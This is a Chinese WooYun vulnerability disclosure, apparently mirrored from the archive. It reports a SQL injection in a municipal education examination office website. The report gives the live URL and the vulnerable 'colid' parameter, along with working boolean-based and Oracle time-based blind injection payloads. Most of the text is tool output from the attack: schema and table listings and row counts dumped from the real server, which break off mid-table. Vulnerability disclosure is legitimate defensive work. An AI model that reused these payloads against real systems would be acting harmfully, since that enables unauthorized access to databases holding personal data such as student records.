乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-07: 细节已通知厂商并且等待厂商处理中 2015-01-12: 厂商已经确认,细节仅向厂商公开 2015-01-22: 细节向核心白帽子及相关领域专家公开 2015-02-01: 细节向普通白帽子公开 2015-02-11: 细节向实习白帽子公开 2015-02-21: 细节向公众公开
某市教育招生考试院网站存在SQL注入导致信息泄露
自己找的,后来在乌云搜了一下,有人提交了。 WooYun: 某市教育招生考试院网站存在SQL注入导致学生信息泄露风险 但是参数不同,所以我也提交了。。前人提交的参数为oid本人提交的链接为:http://www.zhaokao.net/pingjia_pic.jsp?pid=0&colid=18496参数为colid
Place: GETParameter: colid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pid=0&colid=18496) AND 2597=2597 AND (7497=7497 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: pid=0&colid=18496) AND 3035=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(66)||CHR(72)||CHR(101),5) AND (5313=5313---web application technology: JSPback-end DBMS: Oracle
available databases [25]:[*] CTXSYS[*] HR[*] MDSYS[*] ODM[*] ODM_MTR[*] OE[*] OLAPSYS[*] ORDSYS[*] OUTLN[*] PM[*] QS[*] QS_CBADM[*] QS_CS[*] QS_ES[*] QS_OS[*] QS_WS[*] RMAN[*] SCOTT[*] SH[*] SYS[*] SYSTEM[*] VCMS[*] WKSYS[*] WMSYS[*] XDB
跑了几天,由于网速关系,今天终于把表名跑出来了
Database: QS_OS[14 tables]+--------------------------------+| AQ$_QS_OS_ORDERS_MQTAB_H || AQ$_QS_OS_ORDERS_MQTAB_I || AQ$_QS_OS_ORDERS_MQTAB_NR || AQ$_QS_OS_ORDERS_MQTAB_S || AQ$_QS_OS_ORDERS_MQTAB_T || AQ$_QS_OS_ORDERS_PR_MQTAB_H || AQ$_QS_OS_ORDERS_PR_MQTAB_I || AQ$_QS_OS_ORDERS_PR_MQTAB_NR || AQ$_QS_OS_ORDERS_PR_MQTAB_S || AQ$_QS_OS_ORDERS_PR_MQTAB_T || QS_OS_ORDERS_MQTAB || QS_OS_ORDERS_PR_MQTAB || SYS_IOT_OVER_30015 || SYS_IOT_OVER_30033 |+--------------------------------+Database: WKSYS[38 tables]+--------------------------------+| SYS_IOT_OVER_27796 || SYS_IOT_OVER_27912 || WK$CHARSET || WK$CRAWLER_CONFIG_DEFAULT || WK$INSTANCE || WK$INST_ADMIN || WK$LANG || WK$MIMETYPES || WK$SNP_DEP || WK$SNP_TAB || WK$SUBSCRIBER || WK$SYS_CONFIG || WK$SYS_PRIV || WK$_ATTR_MAPPING || WK$_ATTR_USAGE || WK$_AUTHBASIC || WK$_CRAWLER_CONFIG || WK$_CRAWLER_SCHED || WK$_CRAWLER_STAT || WK$_DATA_SOURCE || WK$_DATA_SOURCE_PARAM || WK$_DATA_SOURCE_PARAM_VAL || WK$_DATA_SOURCE_TYPE || WK$_DOC_ATTR || WK$_GROUP_DS_MAPPING || WK$_JOB_INFO || WK$_MAILLIST || WK$_PORTAL || WK$_PORTAL_DS_MAP || WK$_SCHED_MAPPING || WK$_SEARCH_ATTR || WK$_SEARCH_ATTR_TL || WK$_SOURCE_GROUP || WK$_SOURCE_GROUP_TL || WK$_SYSINFO || WK$_SYS_ADMIN || WK$_TDS_LOG || WK$_TRACE |+--------------------------------+Database: ORDSYS[5 tables]+--------------------------------+| JACCELERATOR$DLLS || JACCELERATOR$DLL_ERRORS || JACCELERATOR$STATUS || ORD_CARTRIDGE_COMPONENTS || ORD_INSTALLATIONS |+--------------------------------+Database: HR[7 tables]+--------------------------------+| COUNTRIES || DEPARTMENTS || EMPLOYEES || JOBS || JOB_HISTORY || LOCATIONS || REGIONS |+--------------------------------+Database: OLAPSYS[58 tables]+--------------------------------+| CWM$ARGUMENT || CWM$CLASSIFICATION || CWM$CLASSIFICATIONENTRY || CWM$CLASSIFICATIONTYPE || CWM$CUBE || CWM$CUBEDIMENSIONUSE || CWM$DIMENSION || CWM$DIMENSIONATTRIBUTE || CWM$DOMAIN || CWM$FACTLEVELGROUP || CWM$FACTLEVELUSE || CWM$FACTTABLEMAP || CWM$FACTUSE || CWM$FUNCTION || CWM$FUNCTIONUSE || CWM$HIERARCHY || CWM$ITEMMAP || CWM$ITEMUSE || CWM$LEVEL || CWM$LEVELATTRIBUTE || CWM$MEASURE || CWM$MEASUREDIMENSIONUSE || CWM$MODEL || CWM$OBJECTTYPE || CWM$PARAMETER || CWM$PROJECT || CWM2$AWLOGICALATTRUSE || CWM2$AWLOGICALDIMUSE || CWM2$AWLOGICALHIERUSE || CWM2$AWLOGICALLEVELUSE || CWM2$AWLOGICALMEASUSE || CWM2$AWLOGICALOBJLIMITSETUSE || CWM2$AWPHYSICALOBJ || CWM2$AWPHYSICALOBJEXT || CWM2$AWPHYSICALOBJPROPS || CWM2$AWPHYSICALOBJRELATEDOBJS || CWM2$AW_DIMENSIONMAP || CWM2$AW_MEASUREMAP || CWM2$CUBE || CWM2$CUBEDIMENSIONUSE || CWM2$DIMENSION || CWM2$DIMENSIONATTRIBUTE || CWM2$DIMHIERLVLMAP || CWM2$FACTDIMHIERMAP || CWM2$FACTDIMHIERTPLSDTL || CWM2$FACTKEYDIMHIERLVLMAP || CWM2$FACTKEYDIMHIERMAP || CWM2$HIERARCHY || CWM2$HIERCUSTOMSORT || CWM2$HIERLEVELREL || CWM2$LEVEL || CWM2$LEVELATTRIBUTE || CWM2$LEVELATTRIBUTEMAP || CWM2$MEASURE || CWM2$MEASURETABLEMAP || CWM2$OLAPMANAGERTABLE || CWM2$STOREDDIMLVLTPLS || CWM2$STOREDDIMLVLTPLSDTL |+--------------------------------+Database: OUTLN[3 tables]+--------------------------------+| OL$ || OL$HINTS || OL$NODES |+--------------------------------+Database: XDB[5 tables]+--------------------------------+| XDB$CHECKOUTS || XDB$COLUMN_INFO || XDB$H_INDEX || XDB$PATH_INDEX_PARAMS || XDB$ROOT_INFO |+--------------------------------+Database: QS_CS[8 tables]+--------------------------------+| AQ$_QS_CS_ORDER_STATUS_QT_H || AQ$_QS_CS_ORDER_STATUS_QT_I || AQ$_QS_CS_ORDER_STATUS_QT_NR || AQ$_QS_CS_ORDER_STATUS_QT_S || AQ$_QS_CS_ORDER_STATUS_QT_T || ORDER_STATUS_TABLE || QS_CS_ORDER_STATUS_QT || SYS_IOT_OVER_30090 |+--------------------------------+Database: MDSYS[18 tables]+--------------------------------+| CS_SRS || MD$RELATE || OGIS_GEOMETRY_COLUMNS || OGIS_SPATIAL_REFERENCE_SYSTEMS || SDO_ANGLE_UNITS || SDO_AREA_UNITS || SDO_DATUMS || SDO_DIST_UNITS || SDO_ELLIPSOIDS || SDO_GEOM_METADATA_TABLE || SDO_INDEX_METADATA_TABLE || SDO_LRS_METADATA_TABLE || SDO_MAPS_TABLE || SDO_PROJECTIONS || SDO_STYLES_TABLE || SDO_THEMES_TABLE || USER_CS_SRS || USER_TRANSFORM_MAP |+--------------------------------+Database: ODM[25 tables]+--------------------------------+| CREATE$JAVA$LOB$TABLE || DMS_QUEUE_TABLE || JAVA$CLASS$MD5$TABLE || ODM_APPLY_RESULT || ODM_A_I_MODEL || ODM_CATEGORY_MATRIX_ENTRY || ODM_CLASSIFICATION_TEST_RESULT || ODM_CONFIGURATION || ODM_ERROR_TABLE || ODM_INTERNAL_CONFIGURATION || ODM_ITEM_PRIOR || ODM_I_I_ANTECEDENT || ODM_I_I_RULE || ODM_LIFT_RESULT || ODM_LIFT_RESULT_ENTRY || ODM_MESSAGE_LOG || ODM_MINING_FUNCTION_SETTINGS || ODM_MINING_MODEL || ODM_MINING_TASK || ODM_MINING_TASK_STATE || ODM_MODEL_SEEKER_RESULT || ODM_MS_RESULT_ENTRY || ODM_PMML_DTD || ODM_P_I_ITEM_RULES || ODM_TEST_RESULT |+--------------------------------+Database: QS_CBADM[8 tables]+--------------------------------+| AQ$_QS_CBADM_ORDERS_MQTAB_H || AQ$_QS_CBADM_ORDERS_MQTAB_I || AQ$_QS_CBADM_ORDERS_MQTAB_NR || AQ$_QS_CBADM_ORDERS_MQTAB_S || AQ$_QS_CBADM_ORDERS_MQTAB_T || QS_CBADM_ORDERS_MQTAB || QS_CBADM_ORDERS_SQTAB || SYS_IOT_OVER_30066 |+--------------------------------+Database: CTXSYS[36 tables]+--------------------------------+| DR$CLASS || DR$DELETE || DR$INDEX || DR$INDEX_ERROR || DR$INDEX_OBJECT || DR$INDEX_PARTITION || DR$INDEX_SET || DR$INDEX_SET_INDEX || DR$INDEX_VALUE || DR$OBJECT || DR$OBJECT_ATTRIBUTE || DR$OBJECT_ATTRIBUTE_LOV || DR$ONLINE_PENDING || DR$PARALLEL || DR$PARAMETER || DR$PART_STATS || DR$PENDING || DR$POLICY_TAB || DR$PREFERENCE || DR$PREFERENCE_VALUE || DR$SECTION || DR$SECTION_GROUP || DR$SERVER || DR$SQE || DR$STATS || DR$STOPLIST || DR$STOPWORD || DR$SUB_LEXER || DR$THS || DR$THS_BT || DR$THS_FPHRASE || DR$THS_PHRASE || DR$UNINDEXED || DR$WAITING || SYS_IOT_OVER_26472 || SYS_IOT_OVER_26567 |+--------------------------------+Database: VCMS[31 tables]+--------------------------------+| CODES || DAGANG || DEPARTMENT || FUNS || FUNS_BAK || KCMX || KCMX_BAK || MESSAGE || MYZXJG || ROLEFUNS || ROLES || ROLEUSERS || SEQUENCE || USERS || WEB_ADVISE || WEB_ADVISE || WEB_COLUMN || WEB_DIRECTORMAIL || WEB_DISTRICT || WEB_DOWNLOAD || WEB_DOWNLOADTYPE || WEB_FEEDBACK || WEB_NEWS || WEB_SITE || WEB_STATCOLUMN || WEB_USERCOLUMN || ZKYX || ZKZY_NEW || ZKZY_NEW_BAK || ZSPX || ZXJGANDZHUANYE |+--------------------------------+Database: QS_ES[14 tables]+--------------------------------+| AQ$_QS_ES_ORDERS_MQTAB_H || AQ$_QS_ES_ORDERS_MQTAB_I || AQ$_QS_ES_ORDERS_MQTAB_NR || AQ$_QS_ES_ORDERS_MQTAB_S || AQ$_QS_ES_ORDERS_MQTAB_T || AQ$_QS_ES_ORDERS_PR_MQTAB_H || AQ$_QS_ES_ORDERS_PR_MQTAB_I || AQ$_QS_ES_ORDERS_PR_MQTAB_NR || AQ$_QS_ES_ORDERS_PR_MQTAB_S || AQ$_QS_ES_ORDERS_PR_MQTAB_T || QS_ES_ORDERS_MQTAB || QS_ES_ORDERS_PR_MQTAB || SYS_IOT_OVER_29925 || SYS_IOT_OVER_29943 |+--------------------------------+Database: PM[2 tables]+--------------------------------+| ONLINE_MEDIA || PRINT_MEDIA |+--------------------------------+Database: RMAN[30 tables]+--------------------------------+| AL || BCB || BCF || BDF || BP || BRL || BS || BSF || CCB || CCF || CDF || CKP || CONF || CONFIG || DB || DBINC || DF || DFATT || OFFR || ORL || RCVER || RLH || RR || RT || SCR || SCRL || TS || TSATT || XCF || XDF |+--------------------------------+Database: QS[15 tables]+--------------------------------+| AQ$_AQ$_MEM_MC_H || AQ$_AQ$_MEM_MC_I || AQ$_AQ$_MEM_MC_NR || AQ$_AQ$_MEM_MC_S || AQ$_AQ$_MEM_MC_T || AQ$_MEM_MC || AQ$_QS_ORDERS_PR_MQTAB_H || AQ$_QS_ORDERS_PR_MQTAB_I || AQ$_QS_ORDERS_PR_MQTAB_NR || AQ$_QS_ORDERS_PR_MQTAB_S || AQ$_QS_ORDERS_PR_MQTAB_T || QS_ORDERS_PR_MQTAB || QS_ORDERS_SQTAB || SYS_IOT_OVER_29881 || SYS_IOT_OVER_29906 |+--------------------------------+Database: QS_WS[14 tables]+--------------------------------+| AQ$_QS_WS_ORDERS_MQTAB_H || AQ$_QS_WS_ORDERS_MQTAB_I || AQ$_QS_WS_ORDERS_MQTAB_NR || AQ$_QS_WS_ORDERS_MQTAB_S || AQ$_QS_WS_ORDERS_MQTAB_T || AQ$_QS_WS_ORDERS_PR_MQTAB_H || AQ$_QS_WS_ORDERS_PR_MQTAB_I || AQ$_QS_WS_ORDERS_PR_MQTAB_NR || AQ$_QS_WS_ORDERS_PR_MQTAB_S || AQ$_QS_WS_ORDERS_PR_MQTAB_T || QS_WS_ORDERS_MQTAB || QS_WS_ORDERS_PR_MQTAB || SYS_IOT_OVER_29970 || SYS_IOT_OVER_29988 |+--------------------------------+Database: OE[9 tables]+--------------------------------+| CUSTOMERS || INVENTORIES || ORDERS || ORDER_ITEMS || PRODUCT_DESCRIPTIONS || PRODUCT_INFORMATION || PRODUCT_REF_LIST_NESTEDTAB || SUBCATEGORY_REF_LIST_NESTEDTAB || WAREHOUSES |+--------------------------------+Database: SYSTEM[130 tables]+--------------------------------+| AQ$_INTERNET_AGENTS || AQ$_INTERNET_AGENT_PRIVS || AQ$_QUEUES || AQ$_QUEUE_TABLES || AQ$_SCHEDULES || DEF$_AQCALL || DEF$_AQERROR || DEF$_CALLDEST || DEF$_DEFAULTDEST || DEF$_DESTINATION || DEF$_ERROR || DEF$_LOB || DEF$_ORIGIN || DEF$_PROPAGATOR || DEF$_PUSHED_TRANSACTIONS || DEF$_TEMP$LOB || HELP || LOGMNRC_DBNAME_UID_MAP || LOGMNRC_GSII || LOGMNRC_GTCS || LOGMNRC_GTLO || LOGMNR_AGE_SPILL$ || LOGMNR_ATTRCOL$ || LOGMNR_ATTRIBUTE$ || LOGMNR_CCOL$ || LOGMNR_CDEF$ || LOGMNR_COL$ || LOGMNR_COLTYPE$ || LOGMNR_DICTIONARY$ || LOGMNR_DICTSTATE$ || LOGMNR_HEADER1$ || LOGMNR_HEADER2$ || LOGMNR_ICOL$ || LOGMNR_IND$ || LOGMNR_INDCOMPART$ || LOGMNR_INDPART$ || LOGMNR_INDSUBPART$ || LOGMNR_LOB$ || LOGMNR_LOBFRAG$ || LOGMNR_LOG$ || LOGMNR_OBJ$ || LOGMNR_PROCESSED_LOG$ || LOGMNR_RESTART_CKPT$ || LOGMNR_RESTART_CKPT_TXINFO$ || LOGMNR_SESSION$ || LOGMNR_SPILL$ || LOGMNR_TAB$ || LOGMNR_TABCOMPART$ || LOGMNR_TABPART$ || LOGMNR_TABSUBPART$ || LOGMNR_TS$ || LOGMNR_TYPE$ || LOGMNR_UID$ || LOGMNR_USER$ || LOGSTDBY$APPLY_MILESTONE || LOGSTDBY$APPLY_PROGRESS || LOGSTDBY$EVENTS || LOGSTDBY$PARAMETERS || LOGSTDBY$PLSQL || LOGSTDBY$SCN || LOGSTDBY$SKIP || LOGSTDBY$SKIP_SUPPORT || LOGSTDBY$SKIP_TRANSACTION || MVIEW$_ADV_AJG || MVIEW$_ADV_BASETABLE || MVIEW$_ADV_CLIQUE || MVIEW$_ADV_ELIGIBLE || MVIEW$_ADV_EXCEPTIONS || MVIEW$_ADV_FILTER || MVIEW$_ADV_FILTERINSTANCE || MVIEW$_ADV_FJG || MVIEW$_ADV_GC || MVIEW$_ADV_INDEX || MVIEW$_ADV_INFO || MVIEW$_ADV_JOURNAL || MVIEW$_ADV_LEVEL || MVIEW$_ADV_LOG || MVIEW$_ADV_OUTPUT || MVIEW$_ADV_PARAMETERS || MVIEW$_ADV_PARTITION || MVIEW$_ADV_PLAN || MVIEW$_ADV_PRETTY || MVIEW$_ADV_ROLLUP || MVIEW$_ADV_SQLDEPEND || MVIEW$_ADV_TEMP || MVIEW$_ADV_WORKLOAD || REPCAT$_AUDIT_ATTRIBUTE || REPCAT$_AUDIT_COLUMN || REPCAT$_COLUMN_GROUP || REPCAT$_CONFLICT || REPCAT$_DDL || REPCAT$_EXCEPTIONS || REPCAT$_EXTENSION || REPCAT$_FLAVORS || REPCAT$_FLAVOR_OBJECTS || REPCAT$_GENERATED || REPCAT$_GROUPED_COLUMN || REPCAT$_INSTANTIATION_DDL || REPCAT$_KEY_COLUMNS || REPCAT$_OBJECT_PARMS || REPCAT$_OBJECT_TYPES || REPCAT$_PARAMETER_COLUMN || REPCAT$_PRIORITY || REPCAT$_PRIORITY_GROUP || REPCAT$_REFRESH_TEMPLATES || REPCAT$_REPCAT || REPCAT$_REPCATLOG || REPCAT$_REPCOLUMN || REPCAT$_REPGROUP_PRIVS || REPCAT$_REPOBJECT || REPCAT$_REPPROP || REPCAT$_REPSCHEMA || REPCAT$_RESOLUTION || REPCAT$_RESOLUTION_METHOD || REPCAT$_RESOLUTION_STATISTICS || REPCAT$_RESOL_STATS_CONTROL || REPCAT$_RUNTIME_PARMS || REPCAT$_SITES_NEW || REPCAT$_SITE_OBJECTS || REPCAT$_SNAPGROUP || REPCAT$_TEMPLATE_OBJECTS || REPCAT$_TEMPLATE_PARMS || REPCAT$_TEMPLATE_REFGROUPS || REPCAT$_TEMPLATE_SITES || REPCAT$_TEMPLATE_STATUS || REPCAT$_TEMPLATE_TARGETS || REPCAT$_TEMPLATE_TYPES || REPCAT$_USER_AUTHORIZATIONS || REPCAT$_USER_PARM_VALUES || SQLPLUS_PRODUCT_PROFILE |+--------------------------------+Database: SYS[341 tables]+--------------------------------+| DUAL || ACCESS$ || APPLY$_CONF_HDLR_COLUMNS || APPLY$_DEST_OBJ || APPLY$_DEST_OBJ_CMAP || APPLY$_DEST_OBJ_OPS || APPLY$_ERROR || APPLY$_ERROR_HANDLER || APPLY$_SOURCE_OBJ || APPLY$_SOURCE_SCHEMA || APPROLE$ || AQ$_MESSAGE_TYPES || AQ$_PENDING_MESSAGES || AQ$_PROPAGATION_STATUS || AQ$_PUBLISHER || AQ$_QUEUE_STATISTICS || AQ$_QUEUE_TABLE_AFFINITIES || AQ$_REPLAY_INFO || AQ$_SCHEDULES || AQ_EVENT_TABLE || AQ_SRVNTFN_TABLE || ARGUMENT$ || ASSOCIATION$ || ATEMPTAB$ || ATTRCOL$ || ATTRIBUTE$ || ATTRIBUTE_TRANSFORMATIONS$ || AUD$ || AUDIT$ || AUDIT_ACTIONS || AURORA$SHUTDOWN$CLASSES$ || AURORA$STARTUP$CLASSES$ || AUX_STATS$ || AW$ || AW$CWMTOECM || AW$EXPRESS || BOOTSTRAP$ || CCOL$ || CDC_CHANGE_COLUMNS$ || CDC_CHANGE_SETS$ || CDC_CHANGE_SOURCES$ || CDC_CHANGE_TABLES$ || CDC_SUBSCRIBED_COLUMNS$ || CDC_SUBSCRIBED_TABLES$ || CDC_SUBSCRIBERS$ || CDC_SYSTEM$ || CDEF$ || CLU$ || COL$ || COLLECTION$ || COLTYPE$ || COL_USAGE$ || COM$ || CON$ || CONTEXT$ || DBMS_ALERT_INFO || DBMS_LOCK_ALLOCATED || DEFROLE$ || DEFSUBPART$ || DEFSUBPARTLOB$ || DEPENDENCY$ || DIM$ || DIMATTR$ || DIMJOINKEY$ || DIMLEVEL$ || DIMLEVELKEY$ || DIR$ || DUC$ || ERROR$ || EXPACT$ || EXPDEPACT$ || EXPDEPOBJ$ || EXPPKGACT$ || EXPPKGOBJ$ || EXTERNAL_LOCATION$ || EXTERNAL_TAB$ || FET$ || FGA$ || FGA_LOG$ || FILE$ || HIER$ || HIERLEVEL$ || HISTGRM$ || HIST_HEAD$ || HS$_BASE_CAPS || HS$_BASE_DD || HS$_CLASS_CAPS || HS$_CLASS_DD || HS$_CLASS_INIT || HS$_FDS_CLASS || HS$_FDS_CLASS_DATE || HS$_FDS_INST || HS$_INST_CAPS || HS$_INST_DD || HS$_INST_INIT || ICOL$ || ICOLDEP$ || IDL_CHAR$ || IDL_SB4$ || IDL_UB1$ || IDL_UB2$ || ID_GENS$ || INCEXP || INCFIL || INCVID || IND$ || INDCOMPART$ || INDOP$ || INDPART$ || INDPART_PARAM$ || INDSUBPART$ || INDTYPES$ || JACCELERATOR$DLLS || JACCELERATOR$DLL_ERRORS || JACCELERATOR$STATUS || JAVA$JVM$STATUS || JAVA$JVM$STEPS$DONE || JAVA$POLICY$ || JAVA$POLICY$SHARED$TABLE || JAVA$RMJVM$AUX || JAVA$RMJVM$AUX2 || JAVA$RMJVM$AUX3 || JAVASNM$ || JIJOIN$ || JIREFRESHSQL$ || JOB$ || KOPM$ || LIBRARY$ || LINK$ || LOB$ || LOBCOMPPART$ || LOBFRAG$ || LOC$ || LOG$ || LOGMNRG_ATTRCOL$ || LOGMNRG_ATTRIBUTE$ || LOGMNRG_CCOL$ || LOGMNRG_CDEF$ || LOGMNRG_COL$ || LOGMNRG_COLTYPE$ || LOGMNRG_DICTIONARY$ || LOGMNRG_ICOL$ || LOGMNRG_IND$ || LOGMNRG_INDCOMPART$ || LOGMNRG_INDPART$ || LOGMNRG_INDSUBPART$ || LOGMNRG_LOB$ || LOGMNRG_LOBFRAG$ || LOGMNRG_OBJ$ || LOGMNRG_SEED$ || LOGMNRG_TAB$ || LOGMNRG_TABCOMPART$ || LOGMNRG_TABPART$ || LOGMNRG_TABSUBPART$ || LOGMNRG_TS$ || LOGMNRG_TYPE$ || LOGMNRG_USER$ || LOGMNRT_ATTRCOL$ || LOGMNRT_ATTRIBUTE$ || LOGMNRT_CCOL$ || LOGMNRT_CDEF$ || LOGMNRT_COL$ || LOGMNRT_COLTYPE$ || LOGMNRT_DICTIONARY$ || LOGMNRT_ICOL$ || LOGMNRT_IND$ || LOGMNRT_INDCOMPART$ || LOGMNRT_INDPART$ || LOGMNRT_INDSUBPART$ || LOGMNRT_LOB$ || LOGMNRT_LOBFRAG$ || LOGMNRT_OBJ$ || LOGMNRT_SEED$ || LOGMNRT_TAB$ || LOGMNRT_TABCOMPART$ || LOGMNRT_TABPART$ || LOGMNRT_TABSUBPART$ || LOGMNRT_TS$ || LOGMNRT_TYPE$ || LOGMNRT_USER$ || LOGMNR_BUILDLOG || LOGMNR_INTERESTING_COLS || MAP_COMPLIST$ || MAP_ELEMENT$ || MAP_EXTELEMENT$ || MAP_FILE$ || MAP_FILE_EXTENT$ || MAP_OBJECT || MAP_SUBELEMENT$ || METAFILTER$ || METASTYLESHEET || METAVIEW$ || METAXSL$ || METAXSLPARAM$ || METHOD$ || MIGRATE$ || MLOG$ || MLOG_REFCOL$ || MON_MODS$ || NOEXP$ || NTAB$ || OBJ$ || OBJAUTH$ || OBJECT_USAGE || OBJPRIV$ || ODCI_SECOBJ$ || ODCI_WARNINGS$ || OID$ || OLAP$ALTER_SESSION || OLAPTABLEVELS || OLAPTABLEVELTUPLES || OPANCILLARY$ || OPARG$ || OPBINDING$ || OPERATOR$ || OPQTYPE$ || PARAMETER$ || PARTCOL$ || PARTLOB$ || PARTOBJ$ || PENDING_SESSIONS$ || PENDING_SUB_SESSIONS$ || PENDING_TRANS$ || PROCEDURE$ || PROCEDUREC$ || PROCEDUREINFO$ || PROCEDUREJAVA$ || PROFILE$ || PROFNAME$ || PROPS$ || PROXY_DATA$ || PROXY_ROLE_DATA$ || PRVT_EPGCTAB_ADMIN || PRVT_EPGCTAB_DAD || PRVT_EPGCTAB_DAD_ATTRS || PRVT_EPGCTAB_GLOBALS || PRVT_EPGCTAB_PORTS || PS$ || PSTUBTBL || REC_TAB$ || REC_VAR$ || REFCON$ || REG$ || REGISTRY$ || REG_SNAP$ || RESOURCE_CONSUMER_GROUP$ || RESOURCE_COST$ || RESOURCE_MAP || RESOURCE_PLAN$ || RESOURCE_PLAN_DIRECTIVE$ || RESULT$ || RGCHILD$ || RGROUP$ || RLS$ || RLS_CTX$ || RLS_GRP$ || RULE$ || RULESET$ || RULE_EC$ || RULE_MAP$ || RULE_SET$ || SECOBJ$ || SEG$ || SEQ$ || SETTINGS$ || SLOG$ || SMON_SCN_TIME || SNAP$ || SNAP_COLMAP$ || SNAP_LOADERTIME$ || SNAP_LOGDEP$ || SNAP_OBJCOL$ || SNAP_REFOP$ || SNAP_REFTIME$ || SNAP_SITE$ || SOURCE$ || SQL_VERSION$ || STMT_AUDIT_OPTION_MAP || STREAMS$_APPLY_MILESTONE || STREAMS$_APPLY_PROCESS || STREAMS$_APPLY_PROGRESS || STREAMS$_CAPTURE_PROCESS || STREAMS$_DEF_PROC || STREAMS$_KEY_COLUMNS || STREAMS$_PREPARE_DDL || STREAMS$_PREPARE_OBJECT || STREAMS$_PROCESS_PARAMS || STREAMS$_PROPAGATION_PROCESS || STREAMS$_RULES || SUBCOLTYPE$ || SUBPARTCOL$ || SUM$ || SUMAGG$ || SUMDELTA$ || SUMDEP$ || SUMDETAIL$ || SUMINLINE$ || SUMJOIN$ || SUMKEY$ || SUMPARTLOG$ || SUMPRED$ || SUPEROBJ$ || SYN$ || SYSAUTH$ || SYSTEM_PRIVILEGE_MAP || TAB$ || TABCOMPART$ || TABLE_PRIVILEGE_MAP || TABPART$ || TABSUBPART$ || TRANSFORMATIONS$ || TRIGGER$ || TRIGGERCOL$ || TRIGGERJAVAC$ || TRIGGERJAVAF$ || TRIGGERJAVAM$ || TRIGGERJAVAS$ || TRUSTED_LIST$ || TS$ || TSQ$ || TYPE$ || TYPED_VIEW$ || TYPEHIERARCHY$ || TYPE_MISC$ || UET$ || UGROUP$ || UNDO$ || USER$ || USER_ASTATUS_MAP || USER_HISTORY$ || USTATS$ || UTL_RECOMP_BACKUP_JOBS || UTL_RECOMP_COMPILED || UTL_RECOMP_INVALID || UTL_RECOMP_LOG || UTL_RECOMP_SORTED || VIEW$ || VIEWCON$ || VIEWTRCOL$ || VTABLE$ || _DEFAULT_AUDITING_OPTIONS_ |+--------------------------------+Database: SH[15 tables]+--------------------------------+| CAL_MONTH_SALES_MV || CHANNELS || COSTS || COUNTRIES || CUSTOMERS || FWEEK_PSCAT_SALES_MV || MVIEW$_EXCEPTIONS || MV_CAPABILITIES_TABLE || PLAN_TABLE || PRODUCTS || PROMOTIONS || REWRITE_TABLE || SALES || SALES_TRANSACTIONS_EXT || TIMES |+--------------------------------+Database: SCOTT[4 tables]+--------------------------------+| BONUS || DEPT || EMP || SALGRADE |+--------------------------------+Database: WMSYS[22 tables]+--------------------------------+| WM$ADT_FUNC_TABLE || WM$ENV_VARS || WM$INSTEADOF_TRIGS_TABLE || WM$LOCKROWS_INFO || WM$MODIFIED_TABLES || WM$MW_TABLE || WM$NESTED_COLUMNS_TABLE || WM$NEXTVER_TABLE || WM$REPLICATION_TABLE || WM$RESOLVE_WORKSPACES_TABLE || WM$RIC_TABLE || WM$RIC_TRIGGERS_TABLE || WM$TMP_DBA_CONSTRAINTS || WM$UDTRIG_DISPATCH_PROCS || WM$UDTRIG_INFO || WM$VERSIONED_TABLES || WM$VERSION_HIERARCHY_TABLE || WM$VERSION_TABLE || WM$VT_ERRORS_TABLE || WM$WORKSPACES_TABLE || WM$WORKSPACE_PRIV_TABLE || WM$WORKSPACE_SAVEPOINTS_TABLE |+--------------------------------+Database: ODM_MTR[12 tables]+--------------------------------+| CENSUS_2D_APPLY_BINNED || CENSUS_2D_APPLY_UNBINNED || CENSUS_2D_BUILD_BINNED || CENSUS_2D_BUILD_UNBINNED || CENSUS_2D_TEST_BINNED || CENSUS_2D_TEST_UNBINNED || EIGHT_CLOUDS_APPLY_UNBINNED || EIGHT_CLOUDS_BUILD_UNBINNED || MAGAZINE_2D_BUILD_BINNED || MAGAZINE_2D_TEST_BINNED || MARKET_BASKET_2D_BINNED || MARKET_BASKET_TX_BINNED |+--------------------------------+
顺便 跑了下count
Database: QS_OS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_OS_ORDERS_MQTAB_S | 1 || AQ$_QS_OS_ORDERS_PR_MQTAB_S | 1 |+-----------------------------+---------+Database: WKSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| WK$CHARSET | 57 || WK$CRAWLER_CONFIG_DEFAULT | 38 || WK$MIMETYPES | 35 || WK$LANG | 14 || WK$SYS_CONFIG | 1 |+-----------------------------+---------+Database: ORDSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| ORD_CARTRIDGE_COMPONENTS | 86 || JACCELERATOR$DLLS | 14 || ORD_INSTALLATIONS | 1 |+-----------------------------+---------+Database: HR+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| EMPLOYEES | 107 || DEPARTMENTS | 27 || COUNTRIES | 25 || LOCATIONS | 23 || JOBS | 19 || JOB_HISTORY | 10 || REGIONS | 4 |+-----------------------------+---------+Database: OLAPSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| CWM$ITEMUSE | 118 || CWM$LEVELATTRIBUTE | 67 || CWM$CLASSIFICATIONENTRY | 66 || CWM$ITEMMAP | 59 || CWM$LEVEL | 27 || CWM$CLASSIFICATION | 24 || CWM$DIMENSIONATTRIBUTE | 23 || CWM$DOMAIN | 21 || CWM$FUNCTION | 13 || CWM$CLASSIFICATIONTYPE | 10 || CWM$OBJECTTYPE | 10 || CWM$CUBEDIMENSIONUSE | 7 || CWM$FACTLEVELUSE | 7 || CWM$HIERARCHY | 7 || CWM$DIMENSION | 5 || CWM$PARAMETER | 5 || CWM$FACTUSE | 4 || CWM$FUNCTIONUSE | 4 || CWM$MEASURE | 4 || CWM$MEASUREDIMENSIONUSE | 4 || CWM$MODEL | 3 || CWM$PROJECT | 3 || CWM$CUBE | 2 || CWM$FACTLEVELGROUP | 2 || CWM$FACTTABLEMAP | 2 |+-----------------------------+---------+Database: XDB+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| XDB$H_INDEX | 12 || XDB$ROOT_INFO | 1 |+-----------------------------+---------+Database: QS_CS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| AQ$_QS_CS_ORDER_STATUS_QT_S | 1 |+-----------------------------+---------+Database: MDSYS+-----------------------------+---------+| Table | Entries |+-----------------------------+---------+| CS_SRS | 1000 || SDO_DATUMS | 118 || MD$RELATE | 90 || SDO_DIST_UNITS | 54 || SDO_AREA_UNITS | 48 || SDO_ELLIPSOIDS | 47 || SDO_PROJECTIONS | 